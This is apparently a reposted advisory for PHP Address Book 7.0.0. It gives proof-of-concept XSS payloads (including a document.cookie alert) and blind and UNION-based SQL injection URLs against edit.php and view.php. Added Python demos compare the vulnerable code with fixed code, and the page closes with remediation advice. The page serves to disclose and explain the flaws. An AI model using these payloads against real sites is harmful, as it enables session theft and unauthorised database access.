PHP Address Book 7.0.0: multiple vulnerabilities and fixes
Updated: 2012-05-25 | Posted by: this site

 標(biāo)題: PHP Address Book 7.0.0 Multiple security vulnerabilities

作者: Stefan Schurtz
受影響軟件: Successfully tested on PHP Address Book 7.0.0
開(kāi)發(fā)者網(wǎng)站: http://sourceforge.net/projects/php-addressbook/
Vulnerability description

PHP Address Book 7.0.0 contains multiple cross-site scripting (XSS) and SQL injection (SQLi) vulnerabilities.
 
測(cè)試方法
 
// XSS
 
http://[target]/addressbookv7.0.0/preferences.php?from='"</script><script>alert('xss')</script>
http://[target]/addressbookv7.0.0/group.php/" /><script> alert('xss')</script>
http://[target]/addressbookv7.0.0/index.php?group='"</script><script>alert(document.cookie)</script>
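The payloads above carry `'"</script>` so that, wherever the parameter is echoed, the value ends the surrounding JavaScript string or attribute and starts a fresh `<script>` element. The following Python is an added example, not code from the advisory or from PHP Address Book: the two output templates are a hypothetical reconstruction of how a parameter such as `from` could be echoed into a script block and into an HTML attribute, shown next to the context-specific encoding that neutralises the payload (the PHP equivalents are named in the comments).

```python
"""Added example (not the project's code): context-aware output encoding against the
'"</script><script>... payload. Templates are hypothetical, not the app's real markup."""
import html
import json

PAYLOAD = "'\"</script><script>alert('xss')</script>"  # preferences.php?from=... PoC


def render_script_vuln(value):
    # Raw interpolation into JavaScript: the payload's </script> ends the block and
    # the browser starts a fresh one containing attacker-controlled code.
    return "<script>var from = '" + value + "';</script>"


def render_script_fixed(value):
    # JSON-encode the value and escape < and > so the literal can never contain a tag
    # terminator (PHP: json_encode($v, JSON_HEX_TAG | JSON_HEX_QUOT | JSON_HEX_APOS)).
    encoded = json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")
    return "<script>var from = " + encoded + ";</script>"


def render_attr_vuln(value):
    # Raw interpolation into an HTML attribute: the payload's " closes the attribute.
    return '<input type="text" name="from" value="' + value + '">'


def render_attr_fixed(value):
    # Entity-encode for attribute context (PHP: htmlspecialchars($v, ENT_QUOTES)).
    return '<input type="text" name="from" value="' + html.escape(value, quote=True) + '">'


def script_blocks(markup):
    # Number of opening <script tags in the rendered page; the templates contribute
    # at most one, so anything above that came from the injected value.
    return markup.lower().count("<script")


def decode_script_value(markup):
    # What a JS engine would end up with: parse the literal back out of the block.
    start = markup.index("var from = ") + len("var from = ")
    end = markup.rindex(";</script>")
    return json.loads(markup[start:end])


if __name__ == "__main__":
    for name, fn in [("script vuln", render_script_vuln), ("script fixed", render_script_fixed),
                     ("attr vuln", render_attr_vuln), ("attr fixed", render_attr_fixed)]:
        out = fn(PAYLOAD)
        print(f"{name}: {script_blocks(out)} script tag(s) -> {out}")
    print("fixed script value round-trips:", decode_script_value(render_script_fixed(PAYLOAD)) == PAYLOAD)
```

The point of the two fixed renderers is that the encoding depends on where the value lands: entity encoding is right for HTML body and attribute text but does nothing inside a `<script>` block, where the browser's HTML parser still stops at a literal `</script>`, so script-context values need a JSON encoding that also escapes `<` and `>`.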
 
// SQLi
 
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1)
http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1)
 
// UNION-based injection; needs magic_quotes_gpc off, because the payload must close the quoted string with a literal '
http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+
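The two edit.php requests are a boolean-based test: `IF(1<2,2,1)` evaluates to 2 so `1=2` is false and no record comes back, while `IF(1>2,2,1)` evaluates to 1 and the record is returned; two distinguishable responses are all a blind extraction needs, and the payload contains no quote, so magic_quotes_gpc does not help. The view.php request needs the quote to survive, hence the note about magic quotes. The Python below is an added example, not code from the advisory or from PHP Address Book: it reconstructs the two vulnerable query shapes as assumptions, runs the advisory's payloads against them and against parameterised versions, and emulates the effect of magic_quotes_gpc. SQLite stands in for MySQL, so `IF()` becomes `CASE WHEN`, `version()` becomes `sqlite_version()`, and the UNION has three columns instead of forty; the table layout and rows are constructed for the demo.

```python
"""Added example (not the project's code): advisory payloads against string-built
queries versus bound parameters, using SQLite in place of MySQL."""
import sqlite3

QUERY = "SELECT id, firstname, email FROM addressbook WHERE id="


def make_db():
    # Constructed stand-in for the application's address table.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE addressbook (id INTEGER PRIMARY KEY, firstname TEXT, email TEXT)")
    con.executemany("INSERT INTO addressbook VALUES (?, ?, ?)",
                    [(1, "Alice", "alice@example.org"), (2, "Bob", "bob@example.org")])
    return con


def run(con, sql, params=()):
    try:
        return con.execute(sql, params).fetchall()
    except sqlite3.Error as exc:
        return "error: " + str(exc)


# Hypothetical reconstruction of the two vulnerable query shapes.
def edit_vuln(con, id_param):
    # Numeric context: value pasted in unquoted, so no quote is needed to inject.
    return run(con, QUERY + id_param)


def view_vuln(con, id_param):
    # String context: value pasted in between single quotes.
    return run(con, QUERY + "'" + id_param + "'")


# Hardened versions.
def edit_fixed(con, id_param):
    # Equivalent of (int)$_GET['id'] plus a bound parameter: non-integers are rejected.
    try:
        id_int = int(id_param)
    except ValueError:
        return []
    return run(con, QUERY + "?", (id_int,))


def view_fixed(con, id_param):
    # Bound parameter: the value travels separately from the SQL text.
    return run(con, QUERY + "?", (id_param,))


def magic_quotes_gpc(value):
    # Stand-in for PHP's magic_quotes_gpc (addslashes). PHP emits backslash escapes,
    # which MySQL honours; SQLite only honours doubled quotes, so quotes are doubled
    # here to get the same neutralising effect against this engine.
    return value.replace("'", "''")


# Advisory payloads, translated to SQLite syntax.
PAYLOAD_LT = "1 AND 1=(CASE WHEN 1<2 THEN 2 ELSE 1 END)"   # MySQL: 1 AND 1=IF(1<2,2,1)
PAYLOAD_GT = "1 AND 1=(CASE WHEN 1>2 THEN 2 ELSE 1 END)"   # MySQL: 1 AND 1=IF(1>2,2,1)
PAYLOAD_UNION = "1' UNION ALL SELECT NULL, sqlite_version(), NULL--"  # 3 columns, not 40


def main():
    con = make_db()
    # Boolean-based: the two conditions return different result sets; no quotes involved.
    print("LT:", edit_vuln(con, PAYLOAD_LT))
    print("GT:", edit_vuln(con, PAYLOAD_GT))
    print("GT with magic quotes:", edit_vuln(con, magic_quotes_gpc(PAYLOAD_GT)))
    # UNION-based: the second row carries the database version, but only while the quote survives.
    print("UNION:", view_vuln(con, PAYLOAD_UNION))
    print("UNION with magic quotes:", view_vuln(con, magic_quotes_gpc(PAYLOAD_UNION)))
    # Fixed handlers: payloads are inert, a legitimate id still works.
    print("fixed edit:", edit_fixed(con, PAYLOAD_GT), edit_fixed(con, "1"))
    print("fixed view:", view_fixed(con, PAYLOAD_UNION), view_fixed(con, "1"))


if __name__ == "__main__":
    main()
```

Running it shows the asymmetry the advisory hints at: quote escaping (magic quotes or manual addslashes) leaves the numeric edit.php injection fully working and only blocks the quoted view.php form, whereas bound parameters stop both without caring what the input looks like.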
 
Fix:
The original advisory says only "strengthen filtering". Concretely: in edit.php and view.php, cast id to an integer or use prepared statements with bound parameters, and do not rely on magic_quotes_gpc (it was removed in PHP 5.4 and in any case only covers quoted string contexts, not the unquoted id= injection above). For the XSS, encode on output according to context: htmlspecialchars() with ENT_QUOTES for HTML body and attribute contexts, json_encode() with JSON_HEX_TAG for values written into script blocks, and treat the request path as untrusted input as well, since the group.php/ PoC injects through the path rather than a query parameter.